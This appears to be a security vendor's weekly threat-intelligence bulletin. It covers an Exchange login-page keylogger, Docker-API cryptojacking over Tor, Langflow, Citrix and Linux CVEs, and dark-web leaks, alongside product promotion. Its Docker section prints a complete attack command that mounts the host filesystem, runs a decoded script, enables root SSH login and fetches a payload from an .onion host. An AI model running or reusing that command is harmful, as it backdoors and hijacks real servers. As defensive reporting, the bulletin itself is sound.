This week’s intelligence reveals an escalation in targeted exploitation of emerging software flaws, novel stealthy attack techniques leveraging legitimate infrastructure, and politically driven data leaks orchestrated via dark web channels. Three high-severity vulnerabilities—affecting Langflow AI servers, Citrix NetScaler appliances, and default Linux configurations—have been weaponized in the wild. Attackers are also innovating with JavaScript-based credential harvesting on Microsoft Exchange, and misconfigured Docker APIs combined with the Tor network for stealthy cryptojacking. Meanwhile, hacktivist actors and criminal forums on the dark web have amplified campaigns against high-profile events and mass-market IoT devices.
>>Outpace Attackers With AI-Based Automate Penetration Testing
New Hacking Techniques Emerged This Week
1.JavaScript Keylogger Injection on Microsoft Exchange Login Pages
Overview:
Unidentified actors are exploiting legacy Exchange Server vulnerabilities to insert malicious JavaScript into Outlook Web Access login pages. Two variants have been observed: one writes keystrokes to a file on the compromised server, retrievable via an external request; the other exfiltrates credentials in real time via a Telegram-based APIKey/AuthToken mechanism.
Technical Insight:
After gaining unauthenticated RCE through ProxyShell (CVE-2021-31207, CVE-2021-34473, etc.), the attacker modifies auth.owa to hook form submissions. The injected code encodes captured username/password pairs in Base64 and sends them either over DNS tunnels or HTTP(S) GET requests to a Telegram bot endpoint, bypassing egress filtering.
Impact/Risk:
Victims—including government agencies and logistics firms across 26 countries—have had plaintext credentials harvested for lateral movement and privilege escalation, with minimal chance of detection due to the absence of anomalous outbound connections.
Takeaway for CISO:
Ensure all Exchange servers are patched against ProxyShell and ProxyLogon flaws, enable anomalous script monitoring on IIS, and implement multi-factor authentication with threat-aware login flows.
2.Stealthy Cryptojacking via Misconfigured Docker APIs and Tor
Overview:
Attackers are scanning the internet for exposed Docker daemons, then creating privileged containers mounted to the host root filesystem. Within these containers, they install Tor (via a Base64-encoded shell script) to anonymize C2 traffic, and deploy XMRig miners that connect to hidden .onion pools.
Technical Insight:
The exploit chain begins with a docker ps request to 198.199.72[.]27. If the daemon allows remote control, the adversary runs:
bash
docker run -v /:/hostroot -d alpine sh -c “\
echo ‘Base64-TOR-Setup-Script’ | base64 -d | sh; \
cp /hostroot/etc/ssh/sshd_config .; \
echo ‘PermitRootLogin yes’ >> sshd_config; \
docker-init.sh; \
wget http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/install.sh \
“
This script configures SSH backdoors, installs masscan and torsocks, and stages the XMRig miner with hardcoded wallet addresses.
Impact/Risk:
Compromised cloud workloads and on-prem servers are conscripted into crypto-mining botnets, leading to increased CPU costs, degraded performance, and potential pivoting into internal networks.
Takeaway for CISO:
Block remote Docker API ports (2375), require TLS and mutual auth on Docker daemons, monitor for anomalous container creation, and restrict installation of unauthorized binaries.
New Critical Attack Techniques and CVEs
CVE-2025-3248: Langflow Missing Authentication → Flodrix Botnet DDoS
- Date of Incident: June 19, 2025
- Overview: A missing authentication flaw in Langflow < 1.3.0 allows unauthenticated HTTP requests to spawn commands, exploited to deploy the Flodrix IoT botnet for high-volume DDoS campaigns against AI infrastructure.
- CVSS 3.1: 9.8 (Critical)
- Impact: Full RCE on exposed Langflow servers, data exfiltration, service outages up to 100 Gbps.
- Takeaway: Upgrade to Langflow 1.3.0+, implement network segmentation, and monitor for emerging Flodrix C2 indicators.
FireCompass continuously scans for known CVEs—including Langflow and AI infra misconfigurations—before threat actors find them.
Do you want to see your exposure to known CVEs? Schedule a Demo.
CVE-2025-5777: Citrix NetScaler ADC/Gateway Critical RCE
- Date of Disclosure: June 24, 2025
- Overview: Citrix patched a critical buffer overflow in NetScaler ADC and Gateway’s parsing logic, which can be exploited via crafted HTTP requests to achieve RCE on network-edge appliances.
- CVSS 3.x: 9.0 (Critical)
- Impact: Potential full takeover of VPN gateways, credential theft, and persistent backdoors.
- Takeaway: Immediately apply Citrix’s security update, restrict management interfaces, and audit access logs for anomalous GET/POST requests.
CVE-2025-6018 & CVE-2025-6019: Linux Local Privilege Escalation Chain
- Date of Discovery: June 18, 2025
- Overview: A misconfiguration in PAM on openSUSE/SLE (CVE-2025-6018) permits any SSH session to be treated as a local console login. When combined with a libblockdev bug in the udisks daemon (CVE-2025-6019), attackers can achieve root access without additional patches.
- Impact: Rapid U→RCE on default-configured Linux hosts, enabling kernel-level persistence and lateral movement.
- Takeaway: Apply distro patches, enforce strict allow_active settings in PAM, and disable unnecessary udisks services on servers.
FireCompass detects privilege escalation paths and chaining of multiple CVEs—before attackers can exploit them.
If you’d like to see FireCompass in action, don’t hesitate to Schedule a Demo.
Underworld Whispers: Dark Web Intel Insights
Hacktivist Data Leak—“Cyber Fattah” Targets Saudi Games
- Date of Leak: June 22, 2025
- Overview: The pro-Iranian hacktivist group Cyber Fattah exfiltrated and published SQL dumps—including passport scans, medical certificates, and IBANs—of 6,000+ Saudi Games athletes via phpMyAdmin exploitation. Released on the dark web by “ZeroDayX,” it underscores the intersection of geopolitics and cyber disruption.
- Implications: Exposure of high-profile PII for propaganda and extortion, erosion of public trust in event security.
IoT Surveillance Device Chatter—40,000+ Cameras Exposed
- Observation Window: Early–Mid June 2025
- Insight: Bitsight reports active dark web forum discussions where attackers share scripts to enumerate HTTP/RTSP cameras, auto-extract live feeds, and integrate them into Mirai-style botnets. Over 14,000 devices in the U.S. alone remain vulnerable due to default creds and open ports.
- Implications: Surveillance cameras can serve as pivot points into corporate networks or as distributed DDoS platforms.
Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
>>Start Your FireCompass Free Trial Now
Related Posts:
